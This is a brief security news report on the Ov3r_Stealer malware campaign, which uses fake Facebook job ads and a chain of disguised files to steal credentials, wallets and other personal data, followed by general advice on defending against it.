Ov3r_Stealer Malware Spreads Fake Facebook Job Ads to Steal Personal Data
Threat actors have devised a cunning scheme involving fake job ads on Facebook, using them as a gateway to deploy a newly discovered Windows-based stealer malware known as Ov3r_Stealer.
Table of Contents
Deceptive Tactics Unveiled
The modus operandi begins with enticing job offers, purportedly from reputable companies, to lure unsuspecting individuals. These ads prompt users to click on links embedded within weaponized PDF files, masquerading as legitimate documents hosted on OneDrive.
Unveiling the Malicious Payload
Once the victim clicks on the link, they are directed to a Discord content delivery network (CDN), where an internet shortcut file (.URL) is served. Disguised as a DocuSign document, this shortcut file acts as a conduit for delivering a control panel item (.CPL) file.
The Unfolding of the Attack
Upon execution, the CPL file triggers the retrieval of a PowerShell loader from a GitHub repository, which serves as the springboard for launching Ov3r_Stealer. This sophisticated malware is designed to pilfer a plethora of sensitive information from the victim's system.
Ov3r_Stealer’s Arsenal
Once unleashed, Ov3r_Stealer exhibits a multifaceted approach to data exfiltration. It can harvest a wide array of valuable data, including credentials, crypto wallets, IP addresses, hardware information, passwords, cookies, credit card details, browser extensions, and even a list of installed antivirus products.
The Potential Ramifications
While the exact intentions behind the campaign remain unclear, the stolen data could be sold on underground forums or used to facilitate further cyber attacks. Additionally, Ov3r_Stealer might evolve over time, potentially serving as a delivery mechanism for more destructive payloads like ransomware.
Vigilance and Defense
Given the stealthy nature of Ov3r_Stealer, prompt action is imperative for affected users. Employing robust anti-malware solutions can help detect and remove this threat, safeguarding systems from potential harm.